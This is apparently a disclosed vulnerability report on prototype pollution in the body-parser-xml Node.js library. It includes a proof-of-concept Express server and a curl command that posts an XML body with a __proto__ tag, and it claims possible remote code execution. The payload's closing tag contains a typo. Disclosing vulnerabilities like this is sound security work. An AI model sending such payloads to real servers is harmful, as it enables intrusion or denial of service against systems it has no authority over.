Prototype Pollution in fiznool/body-parser-xml

Valid
Reported on May 18th 2021

✍️ Description

This library uses an XML parsing library which causes prototype pollution. However, this issue can be fixed on our side.

🕵️‍♂️ Proof of Concept

const express = require('express');
const bodyParser = require('body-parser');

require('body-parser-xml')(bodyParser);

const app = express();
const port = 3001

app.use(bodyParser.xml({
xmlParseOptions: {
normalize: true, // Trim whitespace inside text nodes
normalizeTags: true, // Transform tags to lowercase
explicitArray: false, // Only put nodes in array if >1
}
}));

app.post("/", (req, res) => {
console.log(req.body)
console.log(req.body.__proto__)
return res.end("OK")
});

app.listen(port , () => {
console.log(`Server at http://localhost:${port}`)
});

Then make a POST request :

curl -X POST http://localhost:3001/ -d "<__proto__><test>ok</testst></__proto__>" -H "Content-Type: application/xml"

💥 Impact

This vulnerability is capable of causing Remote code execution and denial of service attack depending upon how it is used.